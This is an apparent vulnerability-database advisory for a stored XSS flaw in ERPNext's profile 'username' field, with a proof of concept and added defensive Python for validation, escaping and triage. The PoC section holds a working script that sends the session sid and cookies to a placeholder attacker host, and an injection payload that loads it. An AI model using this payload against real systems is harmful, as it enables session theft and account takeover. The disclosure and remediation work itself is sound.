CVE-2022-23058: Mend Vulnerability Database

ERPNext versions v12.0.9 through v13.0.3 are affected by a stored XSS vulnerability that allows low privileged users to store malicious scripts in the ‘username’ field of ‘My Settings’, which can lead to full account takeover.


Overview

ERPNext versions v12.0.9 through v13.0.3 are vulnerable to stored Cross-Site Scripting (XSS) because user input is not validated properly. A low privileged attacker can inject arbitrary script into input fields when editing their own profile.

Details

ERPNext is affected by a stored XSS vulnerability that allows low privileged users to store malicious scripts in the ‘username’ field of ‘My Settings’.
These scripts execute in a victim’s browser whenever the victim opens a page that renders the vulnerable field. The victim who inadvertently triggers the payload can be a highly privileged user, such as an administrator, so the injected script can extract the sid token and cookies, which leads to full account takeover and privilege escalation. There is also an availability impact: once the JavaScript payload is stored on the server, the victim can no longer browse the platform.

PoC Details

1. Log in to the application as a low privileged user.
2. Open the settings menu in the navigation bar and select My Settings.
3. Enter the malicious script in the ‘username’ field and click Save (see the PoC code below).
4. Create a file named ‘test1.js’ and serve it over HTTP (for example with Python’s built-in http.server module).

The content of the ‘test1.js’ file (as published in the advisory, with the quote characters restored to plain ASCII so the script parses):

// Locate the session id embedded in the page source and isolate its value.
var re = /\\"sid\\":\\s\\"[0-9a-zA-Z]+\\"/gm;
var te = /[0-9a-zA-Z]+/gm;

var getSID = (document.documentElement.innerHTML).match(re);
getSID = getSID[0].split(':');
getSID = getSID[1].match(te);
console.log(getSID);
// Send the sid and the document cookies to the attacker-controlled host by loading a script URL.
var url = 'http://[attacker-ip]:[attacker-port]/?sid=' + getSID;
var script = document.createElement('script');
script.src = url + "&details= " + document.cookie;
document.getElementsByTagName('head')[0].appendChild(script);

5. Open an Incognito tab, go to the ERPNext server and log in as a high privileged user; the browser is redirected to the malicious page.
6. After the successful login, the ‘sid’ value is sent to the attacker, who can then use it to log in as Administrator.

PoC Code

<!--</SCRIPT><script src=http://<attacker-ip>:<port>/test1.js></script>-->

Affected Environments

ERPNext versions v12.0.9 through v13.0.3

Prevention

Upgrade to ERPNext version 13.1.0
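For readers who maintain a fork or cannot upgrade immediately, the following added example (not ERPNext’s or Frappe’s own code) shows the two controls that close this class of bug on a profile field such as ‘username’: an allow-list check at save time and context-aware output encoding at render time. It also includes a triage helper that lists user records whose stored username already contains markup, which is what an operator would run after upgrading. The allow-list policy and the record layout are assumptions for the example; the test input is shaped like the advisory’s PoC payload.

```python
import html
import re

# Constructed input shaped like the PoC payload from the advisory.
POC_USERNAME = '<!--</SCRIPT><script src=http://<attacker-ip>:<port>/test1.js></script>-->'

# Assumed allow-list policy for a username: letters, digits, dot, underscore,
# hyphen and spaces, 1 to 64 characters. This is an example policy, not ERPNext's.
USERNAME_RE = re.compile(r"^[A-Za-z0-9._\- ]{1,64}$")

# Characters that should never appear in a stored username under that policy;
# used to triage records that were saved before the fix.
MARKUP_RE = re.compile(r"[<>\"'&]")

# Constructed sample records in an assumed {"name": ..., "username": ...} layout.
SAMPLE_USERS = [
    {"name": "usr-001", "username": "jane.doe"},
    {"name": "usr-002", "username": POC_USERNAME},
    {"name": "usr-003", "username": "ops-admin 2"},
]


def validate_username(value: str) -> bool:
    """Server-side check at save time: accept only allow-listed characters."""
    return USERNAME_RE.fullmatch(value) is not None


def render_username_vulnerable(value: str) -> str:
    """The failure mode behind the advisory: raw interpolation into HTML."""
    return f"<span class='user'>{value}</span>"


def render_username_safe(value: str) -> str:
    """Output encoding for an HTML text context: the browser sees text, not tags."""
    return f"<span class='user'>{html.escape(value, quote=True)}</span>"


def find_suspicious_usernames(records):
    """Post-upgrade triage: names of records whose username contains markup characters."""
    return [r["name"] for r in records if MARKUP_RE.search(r.get("username", ""))]


if __name__ == "__main__":
    print("PoC username accepted by allow-list:", validate_username(POC_USERNAME))
    print("Encoded rendering:", render_username_safe(POC_USERNAME))
    print("Records to review:", find_suspicious_usernames(SAMPLE_USERS))
```

Validation alone is not enough if older records already hold a payload, which is why the rendering path must encode regardless of what passed validation earlier.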
